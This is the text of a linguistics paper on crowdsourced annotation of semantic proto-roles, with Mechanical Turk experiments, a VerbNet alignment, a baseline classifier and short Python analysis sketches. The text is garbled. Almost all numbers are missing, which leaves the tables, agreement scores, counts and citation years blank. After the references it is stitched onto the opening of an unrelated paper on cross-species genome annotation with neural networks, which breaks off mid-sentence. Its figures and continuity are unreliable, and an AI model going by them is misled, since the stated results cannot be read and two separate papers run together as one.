for example, we define the semlink actor role as a participant that has the binary property of instigation. from these properties we subselected those that were most similar to the original questions proposed by dowty (see table ). for each such property we then generated a question in natural language to be posed to annotators given an example sentence (see table ). the set we report on here represents a subset of the questions we have tested; in ongoing work we are evaluating whether we can expand dowty's set of questions, e.g. to capture roles such as instrument. methods. because we are interested in the potential impact of dowty's proto-roles theory on human language technologies, we perform a number of related crowdsourcing experiments, with the dual aim of validating the existing (psycho-)linguistic literature on proto-roles as well as piloting this highly scalable framework for future decompositional semantic annotation efforts. all of the crowdsourcing experiments in this paper are run using amazon mechanical turk, and (except for the kappa scores reported for experiment ) all workers were recruited from the mturk worker pool. the basic setup of the experiments in sections and is the same. the mechanical turk worker is presented with a single sentence with a highlighted verb and one highlighted argument of that verb. then the worker answers all of the questions in table for that verb-argument pair using a likert scale from to , with the response labels: very unlikely, somewhat unlikely, not enough information, somewhat likely, and very likely (see figure ). each mechanical turk hit yields responses for all the questions in table applied to a single verb-argument pair. the mechanical turk experiments are run with two types of sentences: those with real verbs and nonsense ("nonce") arguments, and those with entirely real english sentences. section discusses the former "type-level" hit with nonce arguments, while section discusses the latter "token-level" annotation task with real arguments.
figure : example hit question with nonce arguments.
data. to obtain verb-argument pairs for the task described here, we drew sentences from the subset of propbank that semlink annotates for verbnet roles. from these, we removed verbs annotated as participles, verbs with trace arguments, verbs under negation or modal auxiliaries, and verbs in embedded clauses to ensure that annotators only saw verbs in veridical contexts – contexts where logical operations such as negation do not interfere with direct judgments about the verbs. for example, in john didn't die, negation reverses the change-of-state judgment for the whole sentence, despite that being part of the meaning of the verb die. we also removed clausal arguments, as most of the questions in table do not make sense when applied to clauses; in ongoing work we are considering how to extend this approach to such arguments. a total of , verb tokens with , argument spans from , sentences remained after applying these filters. analysis. to evaluate whether the results of the following experiments accord with dowty's proposal, we follow kako ( b) in taking the mean difference between the property ratings of the subject and object across sentences; see § . . we present these differences in the same format as in figure .
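the subject-object comparison just described can be made concrete with a small sketch. the record format and field names below are hypothetical (the released data may be organized differently), and ratings are assumed to be on the 1-5 likert scale described above.

from collections import defaultdict
from statistics import mean

def mean_subject_object_differences(records):
    """records: dicts with 'sentence_id', 'position' ('subject'/'object'),
    'property', and 'rating' (1-5). returns per-property mean differences."""
    # pair the subject and object ratings for each (sentence, property)
    by_key = defaultdict(dict)
    for r in records:
        by_key[(r["sentence_id"], r["property"])][r["position"]] = r["rating"]
    diffs = defaultdict(list)
    for (_, prop), ratings in by_key.items():
        if "subject" in ratings and "object" in ratings:
            diffs[prop].append(ratings["subject"] - ratings["object"])
    return {prop: mean(vals) for prop, vals in diffs.items()}

records = [
    {"sentence_id": 1, "position": "subject", "property": "volitional", "rating": 5},
    {"sentence_id": 1, "position": "object", "property": "volitional", "rating": 1},
]
print(mean_subject_object_differences(records))  # {'volitional': 4}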
here we stick with kako's evaluation of the results, in order to demonstrate the convergence of the linguistic and psycholinguistic evidence with computational linguistic approaches; our immediate goal in the present work is not to advance the methodology, but to show that these techniques can be pursued through large-scale crowdsourcing. we perform two mechanical turk experiments on verbs: one with nonce arguments, and one with real data in section . because nonce arguments have no meaning in their own right, we assume that the properties that annotators assign these arguments are a function of the verb and role, not the argument itself. hence, we assume that these annotations are at the verb-role type level. conversely, the experiment in section is at the token level, because all arguments have real english instantiations. experiment : nonce-based. the first experiment we run with nonce arguments is an attempt to replicate the results of kako ( b). recall that kako ( b) upholds the psychological validity of dowty ( )'s argument selection principle, by demonstrating that human subjects assign proto-agent and proto-patient properties to grammatical subject and object arguments according to dowty's prediction. (see figure .) in this experiment, we generate simple transitive sentences with a small set of real verbs and nonce arguments. the set of verbs are precisely those selected by kako ( b) in his first experiment: add, deny, discover, finish, find, help, maintain, mention, pass, remove, show, write. the questions we ask workers to answer come from a slightly expanded set of proto-role properties. there were participants in the experiment, recruited from the mturk worker pool, each completing . hits on average. (as pointed out by a reviewer, a verb in a nonce sentence is potentially ambiguous. because we constructed the nonce sentences from actual frames in propbank examples, an annotator will have at least coarse cues to the intended sense. in this respect we follow kako, and established protocol in nonce experiments in general. we leave the effect of sense ambiguity on nonce property judgments for future work.) the results of this experiment, broadly, replicate kako ( b)'s earlier findings: human annotators on average indicate that, within the same sentence, the subject-position argument is more likely to have proto-agent properties than the object-position argument, and the object-position argument is more likely to have proto-patient properties than the subject-position argument. this finding is illustrated in figure . in addition, the basic facts match kako's original finding; compare figures and . (our instigation property is equivalent to kako's caused change property, and we do not have an analogue of his caused do property.) proto-agent properties have a greater effect than proto-patient properties, and causation, volition, and awareness are all strong proto-agent properties. creation and stationary are all weaker, but non-zero, proto-patient properties for these verbs. there are some differences that are apparent. first of all, where kako did not (in this particular experiment) find an effect of change of state, we did; this is broadly consistent with kako's overall findings. we did not get an effect for movement or for physical existence in this experiment, in contrast to kako's results.
figure : mechanical turk results for the nonce experiment. a positive value for a property indicates that, on average, subject-position arguments received a higher score for that property than object-position arguments.
our ability to replicate kako ( b) is significant for two reasons: (i) it lends further credence to the proto-role hypothesis, and (ii) it establishes that crowd-sourcing with non-experts in a less controlled situation than a formal experiment results in reasonable annotations for this task with minimal training. experiment : corpus-based. can this result extend to real corpus data? if so, the proto-role theory can lead to a valuable source of annotation information about thematic roles. to assess this, we moved from a synthetic nonce task to a much larger scale version of the task using data from propbank (palmer et al., ). each item in this task presents the annotator with a propbank sentence with the predicate and argument highlighted, and asks them the same questions about that actual sentence. the sentences were sampled from propbank as described in § . our primary goal in this collection effort was to obtain internally consistent, broad-coverage annotations. thus we worked through a number of pilot annotation efforts to determine cross-annotator reliability between annotators and with our own judgements. (the pilots were based on a set of verbs selected for frequency in the childes corpus, filtering for verbs that had enough tokens in propbank: want. , put. , think. , see. , know. , look. , say. , take. , tell. , and give. .) from the final version of our pilot we selected a single annotator with strong pairwise agreement amongst the other most prolific annotators. compared to the five other most prolific annotators in our final pilot, the pairwise average cohen's kappa with squared metric on an ordinal interpretation of the likert scale was . . (one of those five annotators had less stable judgements than the rest, which we identified based on a pairwise kappa score of only . with our final annotator; removing that annotator, the average pairwise score with the remaining four annotators rose to . .) in our large-scale annotation task, we have collected property judgments on over , arguments of near , verb tokens, spanning , propbank rolesets. this represents close to hours of annotation effort. the results are shown in figure . because some arguments in propbank are abstract, for which many of the questions in table do not make sense, we added an additional response field that asks "does this question make sense" if the worker gives a response lower than (figure ). figure shows the results with n/a responses removed. for presentation purposes, we convert the temporal existence properties to creation and destruction.
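the agreement statistic reported above (cohen's kappa with a squared weighting over an ordinal reading of the likert responses) corresponds to a quadratically weighted kappa. a minimal sketch using scikit-learn is shown below; the two rating lists are toy data standing in for the actual pilot annotations.

from sklearn.metrics import cohen_kappa_score

# two annotators' 1-5 likert responses to the same items (toy data)
annotator_a = [5, 4, 1, 3, 5, 2, 1, 4]
annotator_b = [5, 5, 1, 2, 4, 2, 1, 4]

kappa = cohen_kappa_score(annotator_a, annotator_b, weights="quadratic")
print(f"quadratically weighted kappa: {kappa:.3f}")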
discussion. the overall results substantially resemble both kako's original results and our nonce-based experiment above.
figure : mechanical turk results for experiment .
figure : experiment with n/a removed.
figure : an additional response field appears for questions that might not be applicable. (example sentence for this question: "the antibody then kills the cell.")
as predicted, the proto-agent properties are predictors of whether an argument will be mapped to subject position, and the proto-patient properties similarly predict objecthood. not all properties are equal, and on this much larger data set we can clearly see that instigation (causation) is the strongest property. because we have many data points and a reliable annotator, the variance on this data is much smaller. this graph confirms the proto-role hypothesis over a large corpus: fine-grained role properties predict the mapping of semantic roles to argument position. this data set puts us in a position to ask a wide range of followup questions about the nature of thematic roles, many of which we cannot address in the present paper. the central question we do address here is about property configurations: since each property configuration represents a coarse-grained role, we can ask what the distribution of property configurations is over this corpus. dowty's prediction is that we should see some clustering around common configurations, but a long tail representing role fragmentation. the prediction of classical approaches is that we should see only the common configurations as clusters, with no long tail. we turn to this issue in the following sections, comparing our role annotations also to roles in verbnet and framenet (using semlink as the mapping among the three data sets). one key difference from dowty's predictions is that stationary appears to act as a proto-agent property. first, we are using a slightly different notion of stationary to dowty, who proposed that it be relative to the event – in this we follow kako. second, our movement property is really about change of location (see table ) and so is not the negation of stationary. third, our corpus is heavily biased to non-physical events and states, where the notion of motion does not apply, and so in this respect may not be fully representative of a more naturalistic corpus. within the relatively small proportion of data that is left, we find that objects do not tend to be stationary, and so if this is correct, it may simply be wrong to classify the absolute version of stationary as a proto-patient property. three examples from the data set are shown in table ; in each case the result is that once n/a responses are excluded, examples such as (b) are still more the norm than examples such as (c).
table : stationary examples from experiment .
(a) he earned a master's degree in architecture from yale. (rtg: n/a)
(b) the bridge normally carries , commuters a day.
(c) baskets of roses and potted palms adorned his bench.
annotation quality. to assess annotation quality we began with a stratified sample based on each propbank argument id in the set { , , , , , }. (while argument ids are meant to be meaningful when conditioned on a roleset, the values still correlate with the "coreness" of an argument even when independent of roleset (e.g., argument ids and are most likely to be agent and patient): our stratification aimed to survey across both "core" and "peripheral" argument role types.) local researchers each then answered questions over this sample, achieving a kappa score of . with the annotator. (one of the authors participated. to obtain categorical roles for purposes of comparison, responses of / were mapped to / , giving configurations on properties over what we might coarsely consider: {false ( ), unknown ( ), true ( )}.) two colleagues generally familiar with thematic roles but without prior experience with the protocol or our goals achieved scores of . and . . finally, a colleague who speaks english as a second language achieved a kappa score of . . these correlations, along with our initial selection criteria for the annotator, combined with the correlations observed in table (discussed below), suggest our process resulted in a useful resource which we will release to the community. in section we additionally provide a qualitative indicator of annotation quality, in the form of an alignment to verbnet roles. comparison to other rolesets. a prediction emerging from the proto-role hypothesis is that, when a set of role-relevant properties such as those in table are tested on a large scale, we should not find clean role-clusters. we do expect to find certain common role-types appearing frequently, but we also expect there to be a long tail of combinations of properties. this is exactly what we find when examining our results.
figure : distribution of property configurations in experiment (configurations ranked by log frequency).
figure shows the frequency of property configurations in the data set. around configurations are attested, with nearly % of those making up the tail. the proto-role hypothesis predicts that there are natural sentences in which an argument can be agent/patient-like, yet be missing one or more proto-agent/patient properties. this is what gives rise to the observed long tail of property configurations: cases that would otherwise be lumped together as, e.g., agent, are instead placed in a more diverse set of bins. while dowty's theory is really about roles at the type-level, these bins are also useful for understanding role annotations at the token level, i.e. capturing exactly those properties that hold of the given argument in context.
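a minimal sketch of the configuration count behind this long-tail observation is given below. the collapse of 1-5 ratings into {false, unknown, true} follows the footnoted mapping only approximately (the exact thresholds are an assumption here), and the input format is illustrative rather than the released data format.

from collections import Counter

PROPERTIES = ["instigated", "volitional", "awareness", "sentient", "moved",
              "phys_existed", "created", "destroyed", "changed_poss",
              "changed_state", "stationary"]

def collapse(rating):
    # assumed mapping: 1/2 -> false, 4/5 -> true, 3 or missing/N/A -> unknown
    if rating in (1, 2):
        return "false"
    if rating in (4, 5):
        return "true"
    return "unknown"

def configuration_counts(arguments):
    """arguments: list of dicts mapping property -> rating (or None for N/A).
    each argument's collapsed tuple of values is its role configuration."""
    counts = Counter()
    for arg in arguments:
        counts[tuple(collapse(arg.get(p)) for p in PROPERTIES)] += 1
    return counts

# sorting counts.most_common() by frequency exposes the long tail directly.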
table shows three real-world sentences taken from the wall street journal involving the verb kill. each sentence has what propbank would call a kill. , arg -pag, or the first argument of the roleset kill. , a particular sense of the word kill. (pag is a recent addition to propbank semantics, standing for proto-agent but interpreted as an unweighted disjunction of features: "it acts volitionally, is sentient, or perceives, causes a change of state, or moves" (kübler and zinsmeister, ). another addition, ppt, stands for proto-patient. while motivated by dowty's terminology, these additions do not capture the individual property-based notion we advocate for here.) further, each of these arguments is labeled as a verbnet agent and framenet killer/cause through semlink. these sentences were selected purely because they were the only instances of kill in our dataset with semlink role annotations. then, when examining our annotations for these arguments, we find that our motivations from § for this enterprise are justified. at the token level, there are robust inferences leading to different results on each example for key proto-role properties, but in each case the subject is still a better proto-agent than the object. from this triplet, we learn that the subject of kill needn't be volitionally involved (as in the accidental death in a), needn't be aware of the killing, and even need not be sentient.
table : comparison of role annotations for kill across resources. ratings: =very unlikely, =very likely.
sentences: (a) she was untrained and, in one botched job killed a client. (b) the antibody then kills the cell. (c) an assassin in colombia killed a federal judge on a medellin street.
propbank kill. , arg -pag: killer. verbnet murder- . - , agent: actor in an event who initiates and carries out the event intentionally or consciously, and who exists independently of the event. framenet killing, killer/cause: (the person or sentient entity) / (an inanimate entity or process) that causes the death of the victim. properties rated per example: instigated, volitional, awareness, sentient, moved, phys existed, created, destroyed, changed poss, changed state, stationary.
the present annotation scheme, in contrast to the coarse label provided to these examples in verbnet, captures this variation while still allowing inference to type-level properties of the verb kill. (these examples also clearly illustrate the degree to which noun semantics can influence thematic role-related judgments when carried out on natural data, something the fine-grained approach allows us to explore directly.) we can also clearly see from this triplet that instigation is constant across examples, as is physical existence. interestingly, example (b) shows that killing does not even preclude the continuation of existence after the event, so the existence property may not be fully independent. table makes a similar point using the verb split. these three instances of split, labeled with the same role (and verb sense) in propbank/verbnet, show clear differences in terms of fine-grained role properties. (note also that in (a), a propbank arg appears in subject position.) while there is consensus on change of state, there is variation in whether the argument is destroyed, changes possession, and is aware of its involvement in the event.
table : comparison of role annotations for split across resources.
sentences: (a) the stock split four-for-one on oct. . (b) "in , the pair split the company in half, with walter and his son, sam, agreeing to operate under the merksamer jewelery name." (c) the company downplayed the loss of mr. lesk and split his merchandising responsibilities among a committee of four people.
propbank split. , arg -ppt: thing being divided. verbnet split- . , patient: undergoer in an event that experiences a change of state, location or condition, that is causally involved or directly affected by other participants, and exists independently of the event. framenet cause to fragment, whole patient: the entity which is destroyed by the agent and that ends up broken into pieces.
alignment with verbnet. in what follows we explore a non-exact mapping where we have taken sentences in semlink annotated with verbnet coarse-grain roles, and simply projected the mean proto-role ratings (subtracting n/a) onto each role.
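the projection just described (mean ratings per verbnet role and property, excluding n/a judgments) can be sketched as a simple group-by. the column names and toy rows below are assumptions for illustration, not the released data format.

import pandas as pd

df = pd.DataFrame([
    {"verbnet_role": "Agent", "property": "instigated", "rating": 5, "applicable": True},
    {"verbnet_role": "Agent", "property": "instigated", "rating": 4, "applicable": True},
    {"verbnet_role": "Theme", "property": "instigated", "rating": 3, "applicable": False},
])

# drop N/A judgments, then average ratings per (role, property) pair
applicable = df[df["applicable"]]
alignment = (applicable
             .groupby(["verbnet_role", "property"])["rating"]
             .agg(["mean", "count"])
             .unstack("property"))
print(alignment)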
this serves two purposes: ( ) the quality of this mapping serves to verify the quality of the proto- role annotations, and ( ) this alignment helps com- pare between coarse and fine-grained role annota- tions. this alignment is a proof-of-concept, and we leave a deeper exploration of ways of doing this sort of alignment for the future. table shows the full alignment. a value of indicates that the role tends to determine the proto-property positively, i.e. agents are extremely likely to be judged as insti- gators. a value close to indicates that the role is neutral with respect to the proto-property, e.g. agents may or may not move. a value close to indicates that the arguments with that role are likely to have the negative version of the proto-property, e.g. agents tend not to change possession. at a broad level the results are strong, though we will not be able to discuss every detail here. in this alignment the judgments of n/a have been removed. in the case of e.g. the instigation value for theme, this supports interpreting the role as assigning no value to instigation at all; similarly for some of the other values for theme. in some this is not the only way to treat n/a ratings, and we will leave a full exploration to future work. role freq instigated volitional awareness sentient moved existed created destroyed chg poss chg state stationary agent . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) theme . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) patient . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) experiencer . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) stimulus . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) topic . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) destination . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) recipient . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) extent — ( ) — ( ) — ( ) — ( ) — ( ) — ( ) . ( ) . ( ) — ( ) . ( ) — ( ) ... roles omitted ... instrument . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) initial loc. . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) beneficiary . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) material . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) predicate — ( ) . ( ) . ( ) — ( ) — ( ) — ( ) . ( ) . ( ) — ( ) . ( ) — ( ) asset — ( ) — ( ) — ( ) — ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) — ( ) table : high and low frequency verbnet roles (via semlink) aligned with mean property ratings when excluding n/a judgments. freq provides the number of annotations that overlapped with a role. in parenthesis is the number of cases for that property which were judged applicable (not n/a). e.g. we annotated , arguments that semlink calls agent, where , of those were deemed applicable for the instigation property, with a mean response of . . mid-frequency roles are omitted here for space reasons; the full alignment is provided with the dataset for this paper. cases with large numbers of n/a responses, e.g. the awareness and sentient properties for theme, the provided mean is high, suggesting the role may be more heterogeneous than would otherwise appear. in lieu of an exhaustive discussion, we will moti- vate the alignment with several interesting examples of awareness. awareness tended to be rated highly. table gives a range of examples illustrat- ing particular tokens of judgements relative to verb- net roles. 
in (a-c) we give three straightforward examples where the bolded argument was judged to be aware of involvement in the event. abstract enti- ties such as companies were consistently annotated as having the potential to be aware. consequently, in b for example, ford is annotated as being aware that mazda makes the tracer for the company. in these cases, it is intuitively right at the token level that the participant is likely to be aware of their involvement in the event, but this does not mean that we can con- clude anything about the role; for example, for ben- eficiaries and instruments we have only a few examples of the awareness property. in c-e, we have given three examples of different ratings for awareness focusing on the destina- tion role. all three ratings are intuitively straight- forward at the token level; in d the recipient of the cases (the court) may not yet be aware of the deci- sion. in e the recipient of the sprinkling was a baby and therefore was quite unlikely to be aware of her rtg (role) example a (agent) they worry about their careers, drink too much and suffer [...] b (beneficiary) mazda makes the tracer for ford. c (destination) commercial fishermen and fish processors filed suit in federal court [...] d (destination) but the court [...] sent the cases back to fed- eral district court in dallas. e (destination) when the good fairy [...] hovered over the cradle of edita [...], she sprinkled her with high e flats, [...] f (instrument*) guests bring movies on tape , and show their favorite three-to-five minute segments on the screen [...] table : examples of awareness: how likely is it that the bold argument is aware of being involved in the event? potential future singing career (a fact about the con- text and argument more than the verb). f helps illus- trate the quality of our annotations: personal com- munication with semlink researchers verified that we discovered a rare bug via our process. semantic proto-role labeling srl systems are trained to predict either: (i) a predicate or frame specific notion of role (e.g., framenet), or (ii) a cross-predicate, shared notion of role (e.g., propbank). (i) allows for fine-grain distictions specific to a single predicate, but risks data sparsity (needing many examples per predi- cate). (ii) allows for sharing statistics across pred- icates, but requires careful, manual cross-predicate the role via semlink should be agent. instigated volitional awareness sentient moved null . . . . . pos . . . . . full . . . . . existed created destroyed chg poss chg state stationary . . . . . . . . . . . . . . . . . . table : test classification accuracies for each property. analysis to ensure equivalent role-semantics (loper et al., ), and as in seen tables and it may not be feasible to ensure exact equivalence. our approach addresses this challenge by drop- ping the notion of categorical role entirely, replacing it with responses to proto-role questions that can be shared across all arguments and predicates. fur- ther, as likelihood judgements may be interpreted as scalars, then this may provide a smoother represen- tation for prediction and downstream use, akin to the recent push to replace categorical “ -hot” word rep- resentations with vector-space models. as an example sprl model, we trained separate log-linear classifiers with l regularization on the judgments of each property in the results from ex- periment . as in fig. we collapsed ratings to a categorical { , , }, and included n/a, for a resul- tant -way classification problem. 
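as a concrete rendering of the baseline just described, the sketch below trains one l2-regularised log-linear classifier per property with scikit-learn; the feature functions anticipate the null / pos / full variants discussed next, and the verb-embedding lookup is a stand-in rather than the multiview lsa vectors used in the experiments.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

def features(example, verb_vectors=None, dim=300):
    """Feature vector for one argument token.

    example (assumed fields): 'verb' (lemma) and 'offset' (signed token distance
    of the argument from the verb).  Intercept only = null model; adding the
    offset = pos model; adding a verb embedding = full model."""
    feats = [1.0]                                   # intercept
    feats.append(float(example["offset"]))          # coarse proxy for syntax
    if verb_vectors is not None:
        feats.extend(verb_vectors.get(example["verb"], np.zeros(dim)))
    return np.asarray(feats)

def train_sprl_models(train, properties, verb_vectors=None):
    """One classifier per proto-role property; labels are the collapsed ratings
    {0, 1, 2} plus 3 for n/a, i.e. a 4-way classification problem."""
    models = {}
    for prop in properties:
        X = np.stack([features(ex, verb_vectors) for ex in train])
        y = np.array([ex["labels"][prop] for ex in train])
        models[prop] = LogisticRegression(penalty="l2", C=1.0,
                                          max_iter=1000).fit(X, y)
    return models
```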
the , ar- guments that appear in the dataset were divided into training ( , ), development ( ), and test ( ). we trained three models: null, with only an intercept feature ; pos, which adds as a feature the linear offset of the argument relative to the verb (as a coarse proxy for syntactic structure); and full, which added a vector embedding of the verb (rastogi et al., ). even with this basic model we see evidence of learning property-specific distributions across verbal predicates, such as for changed state. e.g., the notions of actor, agent, and even patient may overlap in their underlying properties. e.g., the proto-agent of build will be related but not identi- cal to that of kill: where commonalities exist, predictive models can benefit from the overlap. future work on prediction may explore alternative formu- lations, such as a -step process of first predicting n/a, then performing regression on likelihood. the null classifier predicts a rating of for created and destroyed and n/a for all the other properties. http://cs.jhu.edu/˜prastog /mvlsa/ conclusions and future work in this paper we have adopted from theoretical lin- guistics the idea that thematic roles should be de- composed into more fine-grained properties that have a prototype structure – the proto-role hypoth- esis. we developed an annotation task based on this idea, and tested it both in a smale scale nonce-based version and a very large scale version using real data from propbank(/wsj). one main result is that the proto-role hypothesis holds true at this very large scale. a second result is that, at this scale we gain evidence for a substantial amount of ‘role fragmen- tation’ in the lexicon of english: we find approx- imately discrete property configurations. the proto-role approach allows us to cope with fragmen- tation by focusing on the fine-grained properties that make up roles. we showed this allows a greater de- gree of accuracy in role annotations, for example handling variability in fine-grained properties across tokens of a verb in a corpus that lead to coarse- grained categorization challenges. finally, we have shown it practical to directly annotate a corpus with fine-grained properties and produced a large collec- tion of such annotations, which we release to the community. we are currently expanding the annota- tion set beyond wsj, and beyond english, as well as applying it to theoretical questions about verb class and argument structure (davis and koenig, ; kako, b), along with word sense. finally, we are building on the baseline model in § to more broadly investigate how decompositional semantic annotations can guide linguistically motivated rep- resentation learning of meaning. acknowledgments great thanks to martha palmer, tim o’gorman, scott grimm, and the reviewers for their feedback; robert busby for annotations; julian grove for work on a predecessor project with kyle rawlins. thanks to sanjeev khudanpur, john j. godrey, and jan hajic̆, as well as jhu and charles university for coor- dinating the fred jelinek memorial workshop in , supported by nsf pire ( ). support came from an nsf graduate research fellowship, darpa deft fa - - - (large scale paraphrasing for natural language understanding), the jhu hltcoe, the paul allen institute of artificial intelligence (acquisition and use of paraphrases in a knowledge-rich setting), and nsf bcs- (gradient symbolic computation). http://cs.jhu.edu/~prastog /mvlsa/ references afra alishahi and suzanne stevenson. . 
a compu- tational model of learning semantic roles from child- directed language. language and cognitive pro- cesses, ( ): – . collin f. baker, charles j. fillmore, and john b. lowe. . the berkeley framenet project. in proceed- ings of the international conference on computational linguistics, pages – . collin baker, michael ellsworth, and katrin erk. . semeval’ task : frame semantic structure extrac- tion. in proceedings of the th international workshop on semantic evaluations, pages – . association for computational linguistics. frank r. blake. . a semantic analysis of case. in james t. hatfield, werner leopold, and a. j. friedrich ziglschmid, editors, curme volume of linguistic stud- ies, pages – . linguistic society of america. claire bonial, william corvey, martha palmer, volha v. petukhova, and harry bunt. . a hierarchical uni- fication of lirics and verbnet semantic roles. in se- mantic computing (icsc), fifth ieee interna- tional conference on, pages – , september. greg n. carlson and michael k. tanenhaus. . thematic roles and language comprehension. in w. wilkins, editor, syntax and semantics: thematic relations. academic press. greg n. carlson. . thematic roles and their role in semantic interpretation. linguistics, pages – . xavier carreras and lluı́s màrquez. . introduction to the conll- shared task: semantic role label- ing. in proceedings of the ninth conference on com- putational natural language learning, pages – . association for computational linguistics. hector-neri castañeda. . comments on donald davidson’s ‘the logical form of action sentences’. in nicholas rescher, editor, the logic of decision and action. university of pittsburgh press. noam chomsky. . lectures on government and binding. foris publications. w. croft. . syntactic categories and grammatical relations. university of chicago press. d. cruse. . some thoughts on agentivity. journal of linguistics, : – . dipanjan das, nathan schneider, desai chen, and noah a. smith. . probabilistic frame-semantic parsing. in proceedings of human language tech- nologies conference of the north american chapter of the association for computational linguistics, pages – . a. r. davis and j.-p. koenig. . linking as con- straints on word classes in a hierarchical lexicon. lan- guage, : – . david dowty. . on the semantic content of the notion ‘thematic role’. in barbara partee, gennaro chierchia, and ray turner, editors, properties, types and meanings, vol ii. kluwer. david dowty. . thematic proto-roles and argument selection. language, ( ): – . christiane fellbaum. . wordnet. wiley online li- brary. charles fillmore. . towards a modern theory of case. the ohio state university project on linguistic analysis report , the ohio state university. charles j. fillmore. . frame semantics and the na- ture of language. in annals of the new york academy of sciences: conference on the origin and develop- ment of language and speech, volume , pages – . charles fillmore. . frame semantics. linguistics in the morning calm, pages – . daniel gildea and daniel jurafsky. . automatic la- beling of semantic roles. computational linguistics, ( ): – . scott grimm. . the lattice of case and agentivity. msc thesis, university of amsterdam. scott grimm. . semantics of case. morphology, : – . jeffrey s. gruber. . studies in lexical relations. ph.d. dissertation, massachusetts institute of technol- ogy. patrick hanks. . lexical analysis: norms and ex- ploitations. mit press. joshua k. hartshorne, claire bonial, and martha palmer. . 
the verbcorner project: findings from phase of crowd-sourcing a semantic decomposition of verbs. in proceedings of the annual meeting of the associ- ation for computational linguistics, pages – . association for computational linguistics. joshua hartstone, claire bonial, and martha palmer. . the verbcorner project: toward an empirically-based semantic decomposition of verbs. in proceedings of the conference on empirical meth- ods in natural language processing, pages – . geoffrey e. hinton. . implementing semantic net- works in parallel hardware. in geoffrey e. hinton and john a. anderson, editors, parallel models of asso- ciative memory. erlbaum, hillsdale, nj. geoffrey e. hinton. . learning distributed repre- sentations of concepts. in proceedings of the eighth annual conference of the cognitive science society, pages – . amherst, ma. ray s. jackendoff. . semantic interpretation in generative grammar. the mit press. ray s. jackendoff. . the status of thematic relations in linguistic theory. linguistic inquiry, : – . edward kako. a. the semantics of syntactic frames. language and cognitive processes, ( ): – . edward kako. b. thematic role properties of sub- jects and objects. cognition, : – . sandra kübler and heike zinsmeister. . cor- pus linguistics and linguistically annotated corpora. bloomsbury publishing. beth levin and malka rappaport hovav. . argu- ment realization. cambridge university press. beth levin. . english verb classes and alter- nations: a preliminary investigation. university of chicago press. ken litkowski. . senseval- task: automatic label- ing of semantic roles. in senseval- : third interna- tional workshop on the evaluation of systems for the semantic analysis of text, pages – . edward loper, szu-ting yi, and martha palmer. . combining lexical resources: mapping between prop- bank and verbnet. in proceedings of the th interna- tional workshop on computational linguistics. mitchell p marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . james l. mcclelland and alan h. kawamoto. . mechanisms of sentence processing: assigning roles to constituents. in david e. rumelhart and james l. mcclelland, editors, parallel distributed processing: explorations in the microstructure of cognition, vol. . mit press, cambridge, ma. martha palmer, dan gildea, and paul kingsbury. . the proposition bank: a corpus annotated with se- mantic roles. computational linguistics, : – . terence parsons. . events in the semantics of en- glish. mit press, cambridge, ma. james pustejovsky, patrick hanks, and anna rumshisky. . automated induction of sense in context. in proceedings of the international conference on com- putational linguistics. malka rappaport and beth levin. . what to do with theta roles. in w. wilkins, editor, syntax and seman- tics : thematic relations, pages – . academic press. malka rappaport hovav and beth levin. . building verb meanings. in m. butts and w. geuder, editors, the projection of arguments: lexical and composi- tional factors, pages – . csli publications. pushpendre rastogi, benjamin van durme, and raman arora. . multiview lsa: representation learn- ing via generalized cca. in proceedings of the an- nual meeting of the north american chapter of the association for computational linguistics. karin kipper schuler. . verbnet: a broad cover- age, comprehensive verb lexicon. ph.d. dissertation, university of pennsylvania. leonard talmy. . 
figure and ground in complex sentences. in joseph greenberg, editor, universals of human language, pages – . stanford univer- sity press. ralph weischedel, martha palmer, mitchell marcus, ed- uard hovy, sameer pradhan, lance ramshaw, ni- anwen xue, ann taylor, jeff kaufman, michelle franchini, mohammed el-bachouti, robert belvin, and ann houston. . ontonotes release . ldc t . linguistic data consortium, philadel- phia, pa. submitted october accepted may published june corresponding authors ghazaleh khodabandelou, ghazaleh.khodabandelou@u-pec.fr, ghazaleh.khodabandeh@gmail.com julien mozziconacci, julien.mozziconacci@mnhn.fr academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright khodabandelou et al. distributed under creative commons cc-by . open access genome annotation across species using deep convolutional neural networks ghazaleh khodabandelou , , etienne routhier and julien mozziconacci , , laboratoire de physique théorique de la matière condensée (lptmc), sorbonne université, paris, france laboratoire images, signaux et systèmes intelligents (lissi), université val-de-marne (paris xii), paris, france cnrs umr / inserm u - sorbonne université, museum national d’histoire naturelle (mnhn), paris, france institut universitaire de france, paris, france abstract application of deep neural network is a rapidly expanding field now reaching many disciplines including genomics. in particular, convolutional neural networks have been exploited for identifying the functional role of short genomic sequences. these approaches rely on gathering large sets of sequences with known functional role, extracting those sequences from whole-genome-annotations. these sets are then split into learning, test and validation sets in order to train the networks. while the obtained networks perform well on validation sets, they often perform poorly when applied on whole genomes in which the ratio of positive over negative examples can be very different than in the training set. we here address this issue by assessing the genome- wide performance of networks trained with sets exhibiting different ratios of positive to negative examples. as a case study, we use sequences encompassing gene starts from the refgene database as positive examples and random genomic sequences as negative examples. we then demonstrate that models trained using data from one organism can be used to predict gene-start sites in a related species, when using training sets providing good genome-wide performance. this cross-species application of convolutional neural networks provides a new way to annotate any genome from existing high-quality annotations in a related reference species. it also 